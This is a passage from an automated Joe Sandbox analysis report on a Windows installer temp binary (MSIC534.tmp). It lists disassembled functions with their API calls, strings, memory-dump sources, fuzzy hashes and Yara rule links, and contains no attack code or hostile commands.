Instruction Fuzzy Hash: F191C132F186528AFB509F2994502BD2BB0BB58BC8F440137DE0EA7695DE38F0A5CB01

Function 00007FF6D9BF93D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 134COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6D9BF93F0

Strings

> returned:, xrefs: 00007FF6D9BF9464
Last error=, xrefs: 00007FF6D9BF9500
Call to ShellExecute() for verb<, xrefs: 00007FF6D9BF940A

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ErrorLast
String ID: > returned:$Call to ShellExecute() for verb<$Last error=
API String ID: 1452528299-1781106413
Opcode ID: 79a75c3a5b373ac5cbb043d2309fb87b0531bbf019b2df93a7572533a1546614
Instruction ID: 80ec3163f4a5d8ae8a165ff898ca8f2bc95fcc4d6265acd0b83c981f23f697c3
Opcode Fuzzy Hash: 79a75c3a5b373ac5cbb043d2309fb87b0531bbf019b2df93a7572533a1546614
Instruction Fuzzy Hash: 50515A5AA5524582EB214F21E8103BE77F0FF65F88F5A9036DA49873A4EF3DD452C302

Function 00007FF6D9BF3B80 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32 ref: 00007FF6D9BF3C83
LocalFree.KERNEL32 ref: 00007FF6D9BF3CED
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF3D4D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF3D59

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: FreeLocal_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 195334829-0
Opcode ID: b7620b575ae9e2195ab6154113197cb97990b0f63de61dd8a8fb38f0283fe627
Instruction ID: e3e8a243dc3d285cd889ee52c5a6589038e5db1f9aad0482bc72a81761d133a2
Opcode Fuzzy Hash: b7620b575ae9e2195ab6154113197cb97990b0f63de61dd8a8fb38f0283fe627
Instruction Fuzzy Hash: 8451D326A19B8582EB108F28E04427E6370FF95BD8F515732EB9C42B95DF3EE5A0C700

Function 00007FF6D9C37568 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C375E1
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C3763D
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C37678
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C3769D

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 14e28bbd83315e56aa89ba7a815555d4ced952fee517ea659738abf0351f5ce9
Instruction ID: 7fc61c597793e446befc7377dab8da50a396e5a3b1b5678dadc8ea8e7ce0d01b
Opcode Fuzzy Hash: 14e28bbd83315e56aa89ba7a815555d4ced952fee517ea659738abf0351f5ce9
Instruction Fuzzy Hash: 1A415E62A09A8589EB62DF25C4202BC3BB0AF55FC4F49C072D68D87346DE3DD465C716

Function 00007FF6D9BF3AA0 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32 ref: 00007FF6D9BF3AE3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF3B00
LocalFree.KERNEL32 ref: 00007FF6D9BF3B53
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF3B70

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: FreeLocal_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 195334829-0
Opcode ID: 2058b5ff343b4c30444a613e6f738dd4c8883d5a1a72f83e2f17892165ffba93
Instruction ID: 3446083fbea8dc181e1de777589cad0b28c5a1afdc84ef5412782b56532e6f92
Opcode Fuzzy Hash: 2058b5ff343b4c30444a613e6f738dd4c8883d5a1a72f83e2f17892165ffba93
Instruction Fuzzy Hash: 80219065B06A4A84EF48DF6AD45833D32A0EF18BC8F540432DA4C86755DF7ED8A4C340

Function 00007FF6D9C00920 Relevance: 6.1, APIs: 4, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6D9BF6936,?,?,00007FF6D9BF6936,00007FF6D9C00B77), ref: 00007FF6D9C0098F
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C00A1F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C00A25

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: AllocConcurrency::cancel_current_taskLocal_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3382108686-0
Opcode ID: e21704fab570b5260250c1a7fa2d23a6ee15106822e6810bbdf106a81f463f6b
Instruction ID: 5e61ca2de303c7ddc883e380df75e7f2e3af098cee9704fac2baaa4e4570f0a9
Opcode Fuzzy Hash: e21704fab570b5260250c1a7fa2d23a6ee15106822e6810bbdf106a81f463f6b
Instruction Fuzzy Hash: 0821D3A1A09B8685FB149F52A40037D62B1EB14BE4F258636DBAD477D6EE3CE5A0C300

Function 00007FF6D9BF2D30 Relevance: 6.1, APIs: 4, Instructions: 66encryptionCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32 ref: 00007FF6D9BF2D76
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF2DB6
CertFreeCertificateContext.CRYPT32 ref: 00007FF6D9BF2DE2
LocalFree.KERNEL32 ref: 00007FF6D9BF2DF9

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Free$Local$CertCertificateContext_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 976693150-0
Opcode ID: 4d7e5757a4b8fb45d6f1817235b451567160ffc89686e10cb447641be802a98c
Instruction ID: b6cf4bb753697213dd736c3f0cdc21e88fafa7211505576e2585531a671f44ee
Opcode Fuzzy Hash: 4d7e5757a4b8fb45d6f1817235b451567160ffc89686e10cb447641be802a98c
Instruction Fuzzy Hash: 90218C2AA06B8586EB488F29E54437D22B0EB59BC8F189132CB5C86B56DF3DD5E08300

Function 00007FF6D9C01AA0 Relevance: 6.1, APIs: 4, Instructions: 54fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF6D9C01AE2
SetFilePointer.KERNEL32 ref: 00007FF6D9C01B0A
WriteFile.KERNEL32 ref: 00007FF6D9C01B44
CloseHandle.KERNEL32 ref: 00007FF6D9C01B58

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: 34d9c14b5ce983523c59f3785cf987cf770a7b7f0dee9d120179aa1804052436
Instruction ID: 2657975c54478efea0fc679dae44ed6f27acaf59e46bfcafe81199b952bf2321
Opcode Fuzzy Hash: 34d9c14b5ce983523c59f3785cf987cf770a7b7f0dee9d120179aa1804052436
Instruction Fuzzy Hash: 8A114A72A09B5186E7608F16B80472EB6B5FB85BC4F544136EB8D43B58DF3DD065CB80

Function 00007FF6D9BF9A30 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 235COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(?,?,?,?,?,?,?,?,00000000,00000000,?,?,?,00007FF6D9BF5537), ref: 00007FF6D9BF9AC5

Strings

\\?\, xrefs: 00007FF6D9BF9C73, 00007FF6D9BF9D35
\\?\UNC\, xrefs: 00007FF6D9BF9B03, 00007FF6D9BF9BFB

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Path
String ID: \\?\$\\?\UNC\
API String ID: 2875597873-3019864461
Opcode ID: 8b9ba77d20cf81e293a248a6a1d40c74b6832cf9937af5855fb11453d73f124e
Instruction ID: d2ffd92dd56281d91d0f84107741bc43cc7d7a405d74f5e768aaceac428b6986
Opcode Fuzzy Hash: 8b9ba77d20cf81e293a248a6a1d40c74b6832cf9937af5855fb11453d73f124e
Instruction Fuzzy Hash: CDA1DC26F09B4685FB108FA4D4402BD33B0FB4579CF115A36CF1DA3A96DF79A1A18380

Function 00007FF6D9BFA7C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,00000000,?,?,00007FF6D9BFA7A8), ref: 00007FF6D9BFA8B7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BFA8FD

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 00007FF6D9BFA9A1

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: FreeLocal_invalid_parameter_noinfo_noreturn
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
API String ID: 195334829-1713319389
Opcode ID: 784c67a23adc57e6e1380ec58592efdc0e24f606274b4b48ba1a93ef3c156208
Instruction ID: b170e4f5a29701f882b2fc7f28085db99c0244211ae5c5cf97cf0d07b8e53c1c
Opcode Fuzzy Hash: 784c67a23adc57e6e1380ec58592efdc0e24f606274b4b48ba1a93ef3c156208
Instruction Fuzzy Hash: FE51E126B09B8585EA049F16E5441ADB374FB89BC4F984133DB8C47795EF7DE166C300

Function 00007FF6D9C2C008 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6D9C2C032

Strings

csm, xrefs: 00007FF6D9C2C057
csm, xrefs: 00007FF6D9C2C1C6

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: b61b5b8a262240449e3781586ec27361341d3879283c7cff89dbb56452d7f464
Instruction ID: 8d5b28308c192342dbb6b2cafa0b2efb8485677ab073b8f388a43cb499d3e463
Opcode Fuzzy Hash: b61b5b8a262240449e3781586ec27361341d3879283c7cff89dbb56452d7f464
Instruction Fuzzy Hash: 1D71D07290869186DB709F65D49037D7BB0FB05BC4F54A272EA8C87B8ACE3CD561C740

Function 00007FF6D9C41BC8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF6D9C45B44: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C45B77

_get_daylight.LIBCMT ref: 00007FF6D9C41CE0
_get_daylight.LIBCMT ref: 00007FF6D9C41CF1

Strings

?, xrefs: 00007FF6D9C41C71

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 10bec564e25ec30f9018c03ca1fc561d6e050baf150cf86d17da02a2edfcc303
Instruction ID: e7951e6175b6bbc4b8c923b441f4891fc6d7671ab6877167567dbb3f8a9fc3da
Opcode Fuzzy Hash: 10bec564e25ec30f9018c03ca1fc561d6e050baf150cf86d17da02a2edfcc303
Instruction Fuzzy Hash: D6412B22B1878246FB259F25A84137E5670EFA5BE4F144236EEDC87AD5DF3CE4618B00

Function 00007FF6D9C2C6B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6D9C2C75A
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF6D9C2C783

Strings

csm, xrefs: 00007FF6D9C2C883

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: 867b516eb8bbdf87a1c2c6b2c9181f8ed7436badd309d8f4accec465851d6def
Instruction ID: 613d39452ad3d242f86d908e3c1522a5846b5dab9b9a24cced14bcb6737d545d
Opcode Fuzzy Hash: 867b516eb8bbdf87a1c2c6b2c9181f8ed7436badd309d8f4accec465851d6def
Instruction Fuzzy Hash: 5051293661974286E630EF15A54026E77F4FB88BE0F102536EB8D87B95DF38E460CB40

Function 00007FF6D9C3BFD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C3C004
GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6D9C28405), ref: 00007FF6D9C3C020

Strings

C:\Windows\Installer\MSIC534.tmp, xrefs: 00007FF6D9C3C00E

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: FileModuleName_invalid_parameter_noinfo
String ID: C:\Windows\Installer\MSIC534.tmp
API String ID: 3307058713-2551040260
Opcode ID: bba960e90264ebfad4bd95cdfef2176eeb6c49412b1f78af46d9714a3a8b1c9a
Instruction ID: 5a60b313be637452c970c5e840ecbdc39e9c2f7321d6978b511253fd0940048d
Opcode Fuzzy Hash: bba960e90264ebfad4bd95cdfef2176eeb6c49412b1f78af46d9714a3a8b1c9a
Instruction Fuzzy Hash: A4419F36A08A5286EB54AF35A4501BD73B4EF44BD4B544037EE4E87B95EE3DE8A1C340

Function 00007FF6D9C4B44C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6D9C4B564
GetLastError.KERNEL32 ref: 00007FF6D9C4B589

Strings

U, xrefs: 00007FF6D9C4B50E

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: f91bdc684d2395d32e54d8b7256bcfcf0c42bafe7cf999af2e1683b32de0ca03
Instruction ID: 56e38b7b3bcc84f4140a76e89601ff9a502ec815ef9c8eebc9e1be7f3add05cc
Opcode Fuzzy Hash: f91bdc684d2395d32e54d8b7256bcfcf0c42bafe7cf999af2e1683b32de0ca03
Instruction Fuzzy Hash: 0C419F62B19A8186E7209F25E4447ADB7B0FB887C4F804132EA4DC7798EF7CE461CB50

Function 00007FF6D9BF2CA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D9BF28C0: LocalFree.KERNEL32 ref: 00007FF6D9BF2916

LocalFree.KERNEL32 ref: 00007FF6D9BF2D09
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF2D22

Strings

vector too long, xrefs: 00007FF6D9BF2CA4

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: FreeLocal$_invalid_parameter_noinfo_noreturn
String ID: vector too long
API String ID: 2955324198-2873823879
Opcode ID: 5da7785276cff46d836ca9d529bdaae2f4e925051c82b1f9a81f8b146af783fb
Instruction ID: 1b99cefcbcb53c80ed154cb8c46f43fd6a3dccca35835a68655154bf8a1b23cf
Opcode Fuzzy Hash: 5da7785276cff46d836ca9d529bdaae2f4e925051c82b1f9a81f8b146af783fb
Instruction Fuzzy Hash: 69018B25B06A4984EF08DF79D45437D22B0EF04BE8F244A32CA2D867D4DF2DD4A08300

Function 00007FF6D9BFC870 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFC887
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF6D9BFC8C6

Strings

bad locale name, xrefs: 00007FF6D9BFC8DA

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: ff4bfb7af1a39cdc8712dbd924c773a99782365ab42b7c759bc4d989940ead36
Instruction ID: fb381c7e7165dd555884b8ad001a425a9fa09fa3838b9d979b2a9678e74adad5
Opcode Fuzzy Hash: ff4bfb7af1a39cdc8712dbd924c773a99782365ab42b7c759bc4d989940ead36
Instruction Fuzzy Hash: DE016D6350AB8189D748DF79A88016D77B5FB5DB88B28513ACB8DC371AEF38C5A0C340

Function 00007FF6D9C29E34 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6D9C02BC6), ref: 00007FF6D9C29E84
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6D9C02BC6), ref: 00007FF6D9C29EC5

Strings

csm, xrefs: 00007FF6D9C29EB2

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

